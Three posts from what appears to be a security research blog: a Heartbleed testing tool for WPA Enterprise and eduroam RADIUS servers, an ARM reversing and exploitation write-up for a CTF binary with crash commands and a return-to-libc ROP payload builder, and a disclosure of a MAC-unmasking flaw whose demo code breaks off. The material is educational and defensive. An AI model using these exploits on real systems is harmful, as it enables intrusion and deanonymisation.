Friday, 30 May 2014

ApBleed: Heartbleed over WPA1/2 Enterprise

Tl;dr: ApBleed is my proof-of-concept to test heartbleed against wireless networks. Patches welcome.

Once the heartbleed vulnerability in OpenSSL was made public, most focused on its applicability to web servers. Other targets such as SVN servers, VPNs, etc. were also mentioned. However, there was little public discussion about the impact of heartbleed on wireless networks.

Nevertheless, it was clear heartbleed was also exploitable against WPA1/2 enterprise networks, even if it wasn't discussed as publicly as other heartbleed stories. Normally enterprise networks use one of the many EAP methods inside an SSL tunnel to authenticate users. If OpenSSL is being used, this SSL tunnel might be vulnerable to heartbleed.

Of particular interest are networks like eduroam. Eduroam is a world-wide roaming access service between research institutions. This means that I can go to a different country, see an eduroam hotspot, and connect to it using the credentials of my home institution. What's interesting is how my credentials are checked. It's done by setting up an SSL tunnel to the RADIUS server of my own institution. The eduroam network will take care of the necessary packet routing. The image below illustrates this (taken from eduroam website):


Let's assume I'm a student at lsu.edu and currently visiting an institution of utk.edu. If I now connect to an eduroam hotspot, an SSL tunnel will be set up between my device and the RADIUS server of lsu.edu (i.e. my own institution). If my credentials are valid, lsu.edu will notify utk.edu that I should be allowed on the network.

Why is this interesting for an attacker? Because the SSL tunnel is set up before user authentication, and even before you are assigned an IP. The only thing known about you is your MAC address and your "home" institution (i.e. the realm defining your home institution). Of course, an attacker can spoof both the MAC address and the home institution. The attacker only has to be within range of an eduroam hotspot, and he or she can pick any eduroam hotspot at will. The eduroam network will then forward packets to the RADIUS server the attacker specified (i.e. the realm spoofed by the attacker). This is what allows a user to directly set up an SSL tunnel with the radius server of their home institution. However, this means we can anonymously connect to any institution we want!

The guys from eduroam quickly responded to this. Hours after heartbleed got public they posted a warning on their website. One day after heartbleed, with some help from the HostApd mailing list, they had a working proof of concept to test whether institutions were vulnerable. To quote eduroam:
Following up on the heartbleed vulnerability in OpenSSL: it is confirmed that EAP-authentication in RADIUS servers is vulnerable to the attack. It is therefore extremely important to upgrade OpenSSL and restart RADIUS services as soon as possible.
The attack is feasible from any public eduroam hotspot, not just your RADIUS peers.
Federation-level admins in Europe will receive notice from the eduroam OT with a list of vulnerable realms. [..]
While the tools are not publicly available for security reasons, we're providing the service of scanning a realm list for global federation admins on their request. [..]
Though I focus on eduroam, every network using enterprise authentication with an EAP method inside an SSL tunnel might be vulnerable to heartbleed. Nevertheless, eduroam is more interesting than your ordinary network, because it allows you to anonymously connect to any institution which has joined the eduroam federation.

Few public proof-of-concepts were available (if any at all). I can think of three reasons for this. First, not everyone was aware enterprise authentication was vulnerable to heartbleed. Second, it's a little bit harder to make a working proof-of-concept against wireless networks. A third reason might have to do with the impact of public exploits. Because authentication (and hence the SSL tunnel) takes place before getting access to a network, it's not possible to consult a certificate revocation list (CRL) or query the certificate status online (with OCSP) [eduroam]. So revoking certificates is not possible.

Recently, however, proof-of-concepts have started to appear. So it's time to release my own proof-of-concept as well :) I modified wpa_supplicant so that, once it is connected to an AP and ready to talk to the RADIUS server, it opens a local socket. This means you can now connect to this socket and pretend it's the RADIUS server. The big advantage of this approach is that you can use any existing heartbleed tool to test the RADIUS server. Simply let the heartbleed tool connect to the socket created by my proof-of-concept. The code has not been tested thoroughly, but worked in all my small experiments. Get a copy of my PoC (called ApBleed) on GitHub. Patches are welcome!

Some example outputs of running my tool:


Using existing heartbleed tools to connect to the radius server:

Sunday, 15 December 2013

Reversing and Exploiting ARM Binaries: rwthCTF Trafman

As ARM is becoming more and more popular, the need to reverse engineer ARM binaries is increasing as well. For example, nearly all mobile phones have at least one ARM processor. In this post I show how to set up a virtual ARM environment using Qemu, give an introduction to ARM assembly (while highlighting the differences with x86), show how to reverse ARM binaries, and finally demonstrate how to write basic exploits for ARM. We will use the trafman challenge of rwthCTF as an example.


Virtual ARM Environment

To start we need an environment capable of running ARM binaries. Since I didn't have an ARM machine I created a virtual ARM environment using Qemu. Qemu is similar to VirtualBox or VMWare, except that it can support multiple architectures. This allows you to emulate ARM on your default x86 or x64 machine.

First we need to know which ARM architecture to pick. Most Linux distributions support two architectures: armel and armhf. Armel supports the ARMv4 instruction set and emulates floating point operations in software, while armhf supports the ARMv7 instruction set and uses hardware floating point operations. At least that's the case for Debian; Ubuntu uses the term "armel" differently [Ubuntu FAQ, ARM FOSDEM]. In this post I will stick to Debian. Though I haven't tested this myself, it should be possible to run armel binaries on an armhf system (this should be true for both Ubuntu and Debian). For completeness, there were also the 'arm' and 'armeb' architectures, but they are no longer supported and don't appear to be used anymore. We will use the armhf architecture, in particular Debian Wheezy armhf.

Unlike x86/PC systems, ARM systems typically don't have a BIOS. This means nothing initializes the hardware, reads the first sector of the disk, or finds where to execute code from. Instead, Qemu allows you to start a system using a "-kernel" option. It loads the given binary into memory at 0x6001000 and uses a kernel calling convention to pass the commandline and the location of initrd [#IO ARM Challenge]. In practice this means we'll always have to start Qemu using a -kernel and -initrd option.

With that background we're ready to install Debian Wheezy armhf using Qemu. First create an empty directory for the virtual environment, create a virtual harddisk for Qemu, and download the appropriate initrd and vmlinux from the Debian FTP:
Note that vexpress stands for the system we will emulate, namely a Versatile Express board. We will emulate it with a cortex-a9 processor, so we pass vexpress-a9 as an argument to Qemu. Now start the installer under Qemu as follows:
  • qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.gz -append "root=/dev/mmcblk0" -drive if=sd,cache=unsafe,file=hda.img
Follow the instructions. A graphical environment is not required. After the installation we have to extract the installed initrd image, otherwise (if you use the downloaded initrd) the installer will again boot. To mount the virtual filesystem we first have to find the proper offset. Execute "file hda.img". The output should include something like "startsector 2048". The offset is now 512*2048. In case your offset is different than 2048 you will have to update the numbers in the next commands:
  • mkdir mountdir
  • mount -o loop,offset=$((512*2048)) hda.img mountdir/
  • cp mountdir/initrd.img-3.2.0-4-vexpress .
  • umount mountdir/
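The offset arithmetic used for the mount command can be double-checked with a few lines of Python. This is only a sketch: the helper name mount_offset is made up for illustration, and it assumes the output of "file hda.img" contains a "startsector N" field and that sectors are 512 bytes, as in the text above.

```python
import re

SECTOR_SIZE = 512  # bytes per sector, as assumed in the mount command above


def mount_offset(file_output: str) -> int:
    """Return the byte offset of the first partition reported by `file`."""
    match = re.search(r"startsector (\d+)", file_output)
    if match is None:
        raise ValueError("no 'startsector' field found in the output")
    return int(match.group(1)) * SECTOR_SIZE


# Hypothetical, shortened example of what `file hda.img` might print.
sample = "hda.img: x86 boot sector; partition 1: ID=0x83, startsector 2048, 194560 sectors"
print(mount_offset(sample))
```

The printed value is what goes after "offset=" in the mount command.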
And now you can boot your virtual ARM environment with:

  • qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -append "root=/dev/mmcblk0p2" -drive if=sd,cache=unsafe,file=hda.img
You should now have a working Qemu environment.


One warning: Qemu is still an emulator. When testing rare edge cases of exotic ARM instructions (which do not occur much in practice) there's always a chance the emulator is wrong.


Network Interface in Qemu

If the program you want to reverse engineer is a network service, it is convenient to be able to connect to it from your host system. This allows you to use tools on your host system to connect and exploit the binary (while debugging it in the guest system). This is especially convenient if Qemu is slow.

To enable network support we must specify a network device (NIC) that will be emulated. And we must specify the network backend that Qemu should use to interact with the emulated NIC. By default Qemu emulates an Intel e1000 PCI card with a user-mode network stack. User mode networking is great for allowing access to network resources, including the Internet. By default, however, it acts as a firewall and does not permit any incoming traffic. It also doesn't support protocols other than TCP and UDP. For example, ping won't work [WikiBooks].

The first option to allow incoming traffic is port redirection. This allows you to redirect a port on the host OS to a port on the guest OS. For debugging a simple service this is sufficient. As an example, redirecting TCP port 6666 on the host to port 8080 on the guest is done as follows:
qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -append "root=/dev/mmcblk0p2" -drive if=sd,cache=unsafe,file=hda.img -redir tcp:6666::8080
You can now run a service on port 8080 in the Qemu guest, and connect to it from the host using port 6666. Multiple ports can be redirected. Port redirection can also be used to share folders between the guest and the host [WikiBooks]. The downside is that you cannot dynamically add new redirects once Qemu is running. Additionally, only TCP and UDP are supported.

The second option is to create a TAP interface [Tun/Tap IntroQemuWiki]. It offers very good performance and can be configured to create virtually any type of network topology. This creates a new virtual interface on your host system, and you can use this interface to communicate with the guest. To start Qemu using a TAP interface as network backend, use the following command:
qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -append "root=/dev/mmcblk0p2" -drive if=sd,cache=unsafe,file=hda.img -net nic -net tap,ifname=qtap0
Unfortunately you will have to manually configure the network (e.g. set up a DHCP server, configure DNS, configure IP forwarding/NAT, etc). I will not go into detail here. If you don't need an internet connection and only need basic communication between the host and guest, execute the following commands in the guest:
  • ip addr add 172.20.0.2/24 dev eth0
  • route add default gw 172.20.0.1 eth0
I prefer port redirection because it's easier to configure and is usually sufficient to get the job done.


Introduction to ARM Assembly

Simplified, an ARM processor can be in two modes: ARM mode and Thumb mode. When the CPU is in ARM mode it executes 32 bit ARM instructions, and when it is in Thumb mode it executes mixed 16- and 32-bit Thumb instructions. The purpose of Thumb mode is to improve code density. How to switch between ARM and Thumb mode will be explained shortly.

In both ARM and Thumb mode we have access to 16 32-bit registers called r0..r15. Special registers are:
  • r12: intra procedure register (ip)
  • r13: stack pointer (sp)
  • r14: link register (lr)
  • r15: program counter (pc)
Register r12 is sometimes used as an Intra Procedure (ip) call scratch register, meaning it holds intermediate values when a subroutine is being called. So if you see the ip register in a disassembly listing, it does not stand for instruction pointer. Finally, subroutines must preserve the contents of r4..r11 and the stack pointer r13. A few short examples:
sub sp, #8        ; sp -= 8  // allocate stack memory
add r7, sp, #0    ; r7 = sp + 0
add r7, #0        ; r7 += 0
str r0, [r7, #4]  ; *(r7 + 4) = r0 // dereference ptr
str r0, [r7, #0]  ; *(r7 + 0) = r0
nop               ; No Operation
movw r0, #33848   ; r0[0:16]  = 0x8438 // move to bottom
movt r0, #1       ; r0[16:32] = 0x1    // move to top
                  ; Now r0 contains 0x18438
Here r7 is used as a frame pointer to access local variables or function arguments. Also note that certain instructions (like add) can have three arguments (unlike the common two arguments in x86). In order to move a 32-bit word into a register we need two instructions: one to set the bottom half of the register, and one to set the upper half of the register. This is a consequence of the RISC architecture of ARM: we have simple instructions that execute quickly, but must be more verbose to get stuff done.
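To make the movw/movt pair concrete, here is a small Python model of what the two instructions do to a 32-bit register. The function names simply mirror the mnemonics and are not part of any library; the model only covers the immediate forms used in the example.

```python
MASK16 = 0xFFFF


def movw(imm16: int) -> int:
    """movw rd, #imm16: write the low half, the top half becomes zero."""
    return imm16 & MASK16


def movt(reg: int, imm16: int) -> int:
    """movt rd, #imm16: write the top half, keep the low half of rd."""
    return (reg & MASK16) | ((imm16 & MASK16) << 16)


r0 = movw(33848)   # r0 = 0x00008438
r0 = movt(r0, 1)   # r0 = 0x00018438
print(hex(r0))     # 0x18438
```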

What we called jumps in x86 lingo are called branches in ARM. For example "jmp offset" on x86 becomes "b addr" in ARM. Function calls from x86 are also called branches, in particular "call func" from x86 becomes "bl addr" in ARM. Here BL stands for Branch and Link, meaning the program counter r15 is set to addr and the link register r14 is set to the return address. This highlights an important difference with x86: in ARM the return address is not pushed on the stack by the caller. Instead, it is always saved in the link register (lr). The callee is responsible for saving the return address (generally the callee will save it on the stack).

The instructions bx, blx, and bxj can be used to switch processor mode from ARM to Thumb (or reverse). There are two use cases: the target is a label or the target is a register [ARM]. In case the target is a label, the instruction is of the form "blx addr", and the mode is always switched. In case the target is specified using a register, e.g. "blx lr", the mode will be set according to the least significant bit (LSB) of the register. Note that all ARM and Thumb instructions must be at least 16-bit (two bytes) aligned, thus the LSB of the real address of an instruction is always zero. This leaves the bit free to encode the mode: an even address means the target code is ARM code, an uneven address means it is Thumb code. For example, when the register contains the value 0x8001 the processor will switch to Thumb mode and start executing at 0x8000. The same is true when returning from a function: if the return address is even it will switch to ARM, if it is uneven it will switch to Thumb mode. Returning can be done using "pop {pc}" or "bx lr". Both instructions will set the processor mode accordingly. Note that branch instructions without an "X" in them do not change processor mode.

One practical consequence of ARM vs. Thumb addresses is that we often see references to "symbol+1", indicating that the symbol is referring to a function in Thumb mode. Additionally we have to use correct addresses in our exploit: Your debugger might say a function starts at address 0x8000, but if it is a function using Thumb instructions we must actually use the address 0x8001 (depending on context). Finally we note that we can inspect the current mode in gdb by using the "i r cpsr" command. Bit 0x20 will be set if we are in Thumb mode, i.e. Thumb mode is set if (cpsr & 0x20) != 0.
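The address and mode rules described here can be summarised in a short Python sketch. It is a simplified model, not an emulator: the helper names are invented for this post, and only the register form of bx/blx (or "pop {pc}") and the Thumb bit of cpsr are covered.

```python
CPSR_THUMB_BIT = 0x20  # the T bit of cpsr, as read with "i r cpsr" in gdb


def interworking_branch(target: int):
    """Model bx/blx <register> or pop {pc}: return (new pc, new mode)."""
    mode = "thumb" if target & 1 else "arm"
    return target & ~1, mode


def thumb_address(symbol_address: int) -> int:
    """Address to put in an exploit when the function is Thumb code."""
    return symbol_address | 1


def cpsr_is_thumb(cpsr: int) -> bool:
    """True if the processor is currently executing Thumb code."""
    return (cpsr & CPSR_THUMB_BIT) != 0


pc, mode = interworking_branch(0x8001)
print(hex(pc), mode)
```

So a debugger address of 0x8000 for a Thumb function becomes thumb_address(0x8000) = 0x8001 when it is used as a return address.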

Let's end with the second half of the previous example:
blx 0x82ec      ; branch to 0x82ec (and switch mode)
bl 0x8398       ; branch to 0x8398 (don't switch mode)
add r12, r12, #8, 20     ; r12 += 0x8000
                ; 0x8000 = RotateRight(8, 20) [ref]
mov sp, r7      ; set stack pointer to original value
pop {r7, pc}    ; restore r7 and return to caller
The first instruction branches to address 0x82ec and switches the current processor mode, with the return address saved in the lr register. In case we were executing Thumb code this return address will be uneven, otherwise it will be even. The second instruction branches to 0x8398 without switching mode (there is no x in the branch instruction). Hence the function will be executed in the mode the processor is currently in. We also have an interesting add instruction: it adds RotateRight(8, 20) to r12, and this constant is equal to 0x8000. In the instruction encoding the constant is stored as an 8-bit value together with a 4-bit rotation field that is multiplied by two (here the field is 10, giving a rotation of 20 bits). For more background on how this constant is encoded read the ARM documentation.
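The rotated constant can be verified with a short Python sketch. It assumes that the disassembler prints the effective rotation in bits (the "20" in "#8, 20"), and that the encoding stores half of that value in a 4-bit field; the function names are only illustrative.

```python
MASK32 = 0xFFFFFFFF


def ror32(value: int, amount: int) -> int:
    """Rotate a 32-bit value right by `amount` bits."""
    amount %= 32
    value &= MASK32
    return ((value >> amount) | (value << (32 - amount))) & MASK32


def decode_arm_immediate(imm8: int, rotate_field: int) -> int:
    """ARM data-processing immediate: imm8 rotated right by 2 * rotate_field."""
    return ror32(imm8 & 0xFF, 2 * (rotate_field & 0xF))


print(hex(ror32(8, 20)))                 # rotation as printed in "#8, 20"
print(hex(decode_arm_immediate(8, 10)))  # same constant from the encoded fields
```

Both lines print 0x8000, the value that is added to r12.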

If you want to understand ARM in more detail, a fun way to learn it is by making an ARM intro challenge. Essentially that means displaying cool graphics using only ARM code. The full background on how to get started is on #IO STS. Perhaps luckily, a detailed understanding is not required to reverse engineer a program and follow this guide.


Reversing the Trafman Challenge

As an example we will reverse engineer the Trafman challenge from rwthCTF (for the binary to work properly you need to create a directory called "db" next to the binary). We open the binary in IDA and see that it failed to disassemble the first instructions:


This is because start is located at the uneven address 0x880D. In other words the binary starts executing in Thumb mode at address 0x880C, but IDA thinks it starts executing at 0x880D. We fix this by selecting address 0x880C, pressing ALT+G, and changing the value to 1 (this tells IDA that Thumb code is located at this address). Now again select address 0x880C and press C to directly convert the section to code.


We see a call which initializes libc. The pointer to the main function is stored in r0. Hence main() is located at address 0x87E0 and is Thumb code. So go to address 0x87E0, press ALT+G, set value to 1, and repeat until all instructions are in Thumb. Now select all the instructions belonging to the main function and press P to create a function of this code block. We have to manually select all the instructions in the function because otherwise IDA fails to create the function for us. Rename the function to main.


With this starting point you can analyze what the binary is doing. Also remember to interact as much as possible with the application before looking at assembler code. In fact, I found one vulnerability by simply entering unusual inputs.

The binary gets its input and output using stdin and stdout, respectively. During the CTF a new executable was spawned for every new connection and its input/output was forwarded. On startup the binary asks for a username. Our first goal is to find a valid username.


We want to locate the code responsible for checking the username. To do this we find where the error message is referenced. So, open the Strings subview and double click on the "ERR Invalid User" string. Now select the name of the string (aErrInvalidUser) and press X to find all references to the string. Only one function is referencing this string, open it. After a little bit of reverse engineering we get the following:


The ASCII string "traffic_operator" is loaded and compared to the string entered by the user. Based on the result of this comparison we either get the error message or are successfully logged in. That solves our first problem: the username is traffic_operator.

Once logged in the user has three options:
  1. Get command: the user enters a file name of exactly 40 alphanumeric characters. If this file was previously added (see next point) its content is loaded and displayed to the user.
  2. Execute command: the user enters a file name of at least 40 alphanumeric characters. It creates a file named after the first 40 characters and allows the user to write arbitrary content to it.
  3. Exit.
After testing these functions we find a buffer overflow when getting a command (i.e. when reading a file). To trigger the overflow we write a large file using the second option, and then read it using the first option. In my virtual ARM environment I used the following commands to test and trigger the vulnerability:
  • ARM host: nc -c ./trafman -l -p 8000
  • Guest OS: perl -e 'print "traffic_operator\n2\n"."a"x40 ."\n"."A"x400 ."\n1\n"."a"x40 ."\n"' | nc localhost 8000
We will analyze the crash in more detail in the next section. First, we reverse engineer the option menu. It's easy to locate this code because it's contained in the only function that main() calls. So open main and double click on the only non-library function being called. The text-based interface shows only three options. However, when looking at the code, we see there is a hidden option. When entering 23 the address of printf is displayed:


Notice that r0 is set to 0x8FC4 which is a pointer to the ASCII string "> %p". Register r7 is initialized in the beginning of the function to 0x12010. This address contains the dynamically loaded address of printf. Hence, it will tell us where libc is located in memory.


Getting Control of the Program Counter

We know what to do to crash the program. But we don't yet know what is causing the crash, which code is responsible, and whether it's exploitable. To answer these questions we run the binary in a debugger. Executing the following commands allows us to connect to the service from our host OS yet still debug the trafman binary itself:
  • gdb nc
  • set follow-fork-mode child
  • r -c ./trafman -l -p 8000
We now trigger the crash with:
  • perl -e 'print "traffic_operator\n2\n"."a"x40 ."\n"."A"x400 ."\n1\n"."a"x40 ."\n"' | nc localhost 8000
This results in a segmentation fault because it's trying to execute code at 0x41414141. Executing "x/20x $sp" in gdb to dump the stack shows that it's likely a stack overflow vulnerability. With this alone we know enough to write a functional exploit. But since we're learning ARM we will take a look at the code that is responsible for the buffer overflow. We open the function that is executed when the user selects option 1 in the menu and reverse it.


What happens here is that each byte in the file gets read using fgetc until we are at the end of the file. In every loop the new byte is saved to an array on the stack, which will eventually overflow. The function returns to the caller using a "pop {pc}" instruction. An interesting instruction here is "adds r0, #1". It adds one to the register r0, and updates the status (a.k.a. condition) flags according to the resulting value. In particular, if the result is zero (meaning r0 was -1), the zero flag will be set. Using the BNE instruction we test for the zero flag. If it is set we exit the loop. Note that more instructions can set the status flag this way, and they can be recognized using the S suffix.

So we indeed have a classic buffer overflow (without a stack canary). The return address is saved on the stack and popped on the function exit. Our first step in exploiting the binary is to find out where we have to put the return address in our file (remember that the content of the file is written to the stack and parts of it will overflow the saved return address). To quickly accomplish this we use the pattern_create tool from metasploit. We again start the binary in Qemu as follows (I won't repeat this again):
  • gdb nc
  • set follow-fork-mode child
  • r -c ./trafman -l -p 8000
On our host we execute the following commands:
  • PATRN=$(/usr/share/metasploit-framework/tools/pattern_create.rb 400)
  • perl -e 'print "traffic_operator\n2\n"."a"x40 ."\n"."'$PATRN'" ."\n1\n"."a"x40 ."\n"' | nc localhost 8000
We let pattern_create.rb generate a unique pattern of 400 characters. As an example, a unique pattern of 20 characters would be "Aa0Aa1Aa2Aa3Aa4Aa5Aa". If we now know which bytes in this pattern get loaded in the program counter, we can let pattern_offset.rb calculate the offset where the return address is located in our file. In gdb we see it segfaults with the program counter at 0x41326a40. So we find the offset with the following command:
  • /usr/share/metasploit-framework/tools/pattern_offset.rb 41326a40
This returns 276. So we have to put the return address 276 bytes into the payload. As a quick test, execute the following command:
  • perl -e 'print "traffic_operator\n2\n"."a"x40 ."\n"."A"x276 ."ABCD\n1\n"."a"x40 ."\n"' | nc localhost 8000
This will segfault with the program counter at "ABCD". We now need to point the program counter to code that will get us a shell. Unfortunately the binary uses both ASLR and NX, meaning it uses random addresses, and we can't execute data on the stack and/or heap.
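The offset of 276 found above can be cross-checked without metasploit. The sketch below reimplements the pattern in Python, assuming it is built from upper-case letter, lower-case letter, digit triples (which matches the 20-character example above). One detail is an assumption on my side: the value shown in pc has its lowest bit cleared because that bit selects Thumb mode, so the bytes taken from the file were most likely 0x41326a41, and that is the value searched for here.

```python
import string
import struct


def pattern_create(length: int) -> str:
    """Build the cyclic pattern Aa0Aa1Aa2... truncated to `length` characters."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if 3 * len(triples) >= length:
                    return "".join(triples)[:length]
    return "".join(triples)[:length]


def pattern_offset(value: int, length: int = 400) -> int:
    """Offset of the little-endian bytes of `value` in the pattern, or -1."""
    needle = struct.pack("<I", value).decode("latin-1")
    return pattern_create(length).find(needle)


crash_pc = 0x41326A40                 # program counter reported by gdb
print(pattern_offset(crash_pc | 1))   # restore the Thumb bit before searching
```

With the Thumb bit restored the four bytes are "Aj2A", which sits 276 bytes into the pattern.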


Defeating ASLR and NX

Our goal is a return-to-libc attack. In particular we will attempt to execute system("/bin/sh"). Defeating ASLR is trivial due to the hidden menu option which prints the address of printf. Based on the address of printf we can locate the addresses of other variables and functions within the libc library. To get the address of printf and system for a specific run we execute "p printf" and "p system" in gdb. This gives:
  • system: 0x76f2aa38
  • printf: 0x76f347d4
There is one catch: gdb says these functions are located at an even address. However, the functions are actually Thumb code! So make sure that the correct processor mode is used when executing these functions (if necessary make the addresses uneven). Anyway, the hidden menu option returns an uneven address, hence to get the address of system we take the address of printf and subtract 0x9D9C from it.

So we can call system, but still need to pass an argument to it. There are two steps to accomplish this: first we need to find out where in memory the string "/bin/sh" is located, then we need to find a way to put a pointer to this string into register r0 (recall that r0 contains the first argument of a function).

Finding a "/bin/sh" string is easy. Internally the system() function uses it as well, so it's located in the libc library. To quickly find it execute the following in gdb:
  • find &system, +99999999, "/bin/sh"
In my particular instance this returned 0x76fc6528. So to dynamically get the address of "/bin/sh" we take the address of printf and add 0x91D53 to it (again remember that the hidden option returns the uneven address). To load this pointer into r0 with NX enabled we will use return-oriented-programming (ROP).

We will use ROP gadgets located in the libc library, because that's the only library we know the addresses of. Within the library we have to find gadgets which set r0 and let us return to the system function. To do this I transferred libc.so.6 to the host and executed:
  • arm-linux-objdump -d libc.so.6 | grep "pop.*r0.*pc"
To install the arm-linux-* tools see IO SmashTheStack. There are likely better tools to find usable gadgets, but this quick and dirty method got the job done. It is important to search for both Thumb and ARM gadgets! Forcing Thumb mode can be done using -Mforce-thumb. The most interesting gadget found was:
  • 5a7bc: pop  {r0, r4, pc}
Note that this is an ARM instruction. In objdump printf is located at 0x387d4. I found this by executing:
  • arm-linux-objdump -d libc.so.6 | grep "printf>:"
So to dynamically get the location of the gadget we take the location of printf and add 0x21FE8 to it. Good, we now have everything in place to trigger the overflow and make it execute system("/bin/sh"). Combining all findings results in the following exploit, where I wrote the nclib myself and its functionality should be self-explanatory. When executing the exploit it looks like this:
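The original exploit listing and the nclib helper are not reproduced here. As a rough illustration only, the sketch below shows how the overflow data could be assembled from the numbers found in this section. Several things are my own assumptions: the offsets are expressed relative to the even address of printf (so the leaked uneven value is first rounded down), the gadget address is kept even because it is ARM code, the filler value for r4 is arbitrary, and the function name build_payload is hypothetical. Sending the payload through the menu is left out.

```python
import struct

RET_OFFSET = 276               # bytes before the saved return address
SYSTEM_BELOW_PRINTF = 0x9D9C   # printf - system, from the gdb output
BINSH_ABOVE_PRINTF = 0x91D54   # "/bin/sh" - printf (even printf address)
GADGET_ABOVE_PRINTF = 0x21FE8  # pop {r0, r4, pc} - printf, from objdump


def build_payload(leaked_printf: int) -> bytes:
    """Build file content that should end in system("/bin/sh")."""
    printf = leaked_printf & ~1                   # drop the Thumb bit
    system = (printf - SYSTEM_BELOW_PRINTF) | 1   # Thumb code: uneven address
    binsh = printf + BINSH_ABOVE_PRINTF           # plain data pointer
    gadget = printf + GADGET_ABOVE_PRINTF         # ARM code: even address
    chain = struct.pack(
        "<IIII",
        gadget,      # overwrites the saved return address
        binsh,       # popped into r0: first argument of system
        0x42424242,  # popped into r4: unused filler
        system,      # popped into pc
    )
    return b"A" * RET_OFFSET + chain


payload = build_payload(0x76F347D5)  # example leak from the run shown above
print(len(payload), payload[RET_OFFSET:].hex())
```

For the run shown earlier this places 0x76f567bc, 0x76fc6528, a filler word and 0x76f2aa39 directly after the 276 padding bytes.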


DONE. FINALLY! :D

Sunday, 10 November 2013

Unmasking a Spoofed MAC Address (CVE-2013-4579)

Update: This vulnerability has been fixed in kernel 3.8.13.16 and above.

Certain Atheros wireless drivers do not properly update the MAC address when changed (spoofed) by a user. This allows an active attacker to retrieve the original MAC address. In short, spoofing your MAC address does not always hide the original MAC address.


Background

While working on the ath9k_htc driver (used by Atheros USB WiFi dongles) I noticed the driver did not properly set a spoofed MAC address. Though the device appears to use the newly assigned MAC address correctly, the flaw allows an attacker capable of injecting packets towards the target to uncover the original MAC address.

The cause of the problem lies in how the driver and hardware implement Multiple Virtual Interface (VIF) support. Using this technology a single wireless chip can listen on multiple MAC addresses. Because sending an acknowledgement to correctly received packets is done in hardware, a question that arises is how the wireless chip can quickly determine whether a wireless packet was destined for it. At first you'd think there must be some method to give the hardware a (possibly fixed length) list of MAC addresses to listen on. However, some devices use a different strategy (and in particular Atheros devices use this method). Their strategy is the following: the wireless chip has a register which contains the "main" hardware MAC address (mainmac), and a register containing a mask (macmask). Given an incoming frame destined for a particular MAC (incmac), it sends an ACK and accepts the frame if and only if: (mainmac & macmask) == (incmac & macmask). You can see that macmask determines which bits of incmac (MAC of the packet being received) have to match those of mainmac. Essentially the macmask represents the locations where the bits of all the virtual MAC addresses are identical to the "main" hardware MAC address (mainmac).

To clarify, consider a device having two virtual interfaces, one with MAC address 72:40:a2:3f:65:5a and another one with address 8e:8e:95:cd:90:4e. In binary these MAC addresses are:
01110010 : 01000000 : 10100010 : 00111111 : 01100101 : 01011010  (72:40:a2:3f:65:5a)
10001110 : 10001110 : 10010101 : 11001101 : 10010000 : 01001110  (8e:8e:95:cd:90:4e)
Now, macmask should consist of the bits where both these MAC addresses are the same (mathematically that's the negation of the XOR). In our example the mask would be:
00000011 : 00110001 : 11001000 : 00001101 : 00001010 : 11101011  (03:31:c8:0d:0a:eb)
So the wireless chip can pick either 72:40:a2:3f:65:5a or 8e:8e:95:cd:90:4e as its main MAC address, and then set the mask to 03:31:c8:0d:0a:eb. Frames sent to either of these MAC addresses will now be accepted and acknowledged. For more details see the comments in the atheros driver source file. Unfortunately this technique has the side effect that the wireless chipset now listens on more MAC addresses than we really want, as not all bits of incoming frames are checked!
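The mask from this example can be reproduced in a few lines of Python. This is a model of the matching rule described above, not driver code; the helper names are made up for illustration.

```python
MAC_MASK_48 = (1 << 48) - 1


def parse_mac(text: str) -> int:
    """Convert 'aa:bb:cc:dd:ee:ff' to a 48-bit integer."""
    return int(text.replace(":", ""), 16)


def format_mac(value: int) -> str:
    """Convert a 48-bit integer back to 'aa:bb:cc:dd:ee:ff'."""
    return ":".join(f"{(value >> shift) & 0xFF:02x}" for shift in range(40, -8, -8))


def mac_mask(mac_a: int, mac_b: int) -> int:
    """Bits where both addresses agree: the negation of the XOR."""
    return ~(mac_a ^ mac_b) & MAC_MASK_48


def accepts(mainmac: int, macmask: int, incmac: int) -> bool:
    """The hardware rule: ACK iff the masked bits match."""
    return (mainmac & macmask) == (incmac & macmask)


vif1 = parse_mac("72:40:a2:3f:65:5a")
vif2 = parse_mac("8e:8e:95:cd:90:4e")
mask = mac_mask(vif1, vif2)
print(format_mac(mask))
# An address that belongs to neither interface is accepted as well:
print(accepts(vif1, mask, parse_mac("f2:40:a2:3f:65:5a")))
```

The last line shows the side effect mentioned above: f2:40:a2:3f:65:5a differs from the main address only in a bit that the mask ignores, so it is acknowledged too.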

Vulnerability Details

When a MAC address is spoofed the driver does not simply update the mainmac register. Instead the mainmac register will still contain the original MAC address, and macmask will contain the bits where the original and spoofed MAC agree (see previous section). The wireless chip will acknowledge frames sent to the spoofed MAC addresses, and the operating system will include the spoofed MAC address in all packets, so everything will seem to work properly. Unfortunately this method allows an attacker to uncover the original MAC address bit by bit (given the spoofed MAC address). Specifically we can determine the value of any bit of the original MAC address as follows:
  1. Flip the bit in the spoofed MAC address and send a packet to the modified MAC address.
  2. We now have two cases:
    • The device replies with an ACK: This means the mask for this bit is zero, thus the bit in the spoofed MAC address was different than the original MAC address.
    • The device doesn't reply: This means the mask for this bit is one, so the bit we are guessing was identical to the bit in the spoofed MAC address.
By doing this for each bit, we eventually learn the complete original MAC address.
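The bit-by-bit recovery can be simulated offline. In the sketch below the vulnerable device is modelled by a Python function that answers whether a frame would be acknowledged; in a real attack that answer comes from injecting frames and listening for ACKs, which is not shown here. All names and the example addresses are hypothetical.

```python
MAC_BITS = 48
MAC_MASK_48 = (1 << MAC_BITS) - 1


def make_vulnerable_device(original: int, spoofed: int):
    """Model a chip that keeps mainmac = original and only adjusts macmask."""
    mainmac = original
    macmask = ~(original ^ spoofed) & MAC_MASK_48

    def sends_ack(dst: int) -> bool:
        return (mainmac & macmask) == (dst & macmask)

    return sends_ack


def recover_original(spoofed: int, sends_ack) -> int:
    """Flip each bit of the spoofed MAC and watch for ACKs."""
    original = spoofed
    for bit in range(MAC_BITS):
        probe = spoofed ^ (1 << bit)
        if sends_ack(probe):
            # ACK: the mask bit is zero, so the original differs here.
            original ^= 1 << bit
    return original


real = 0x001122334455      # made-up original address
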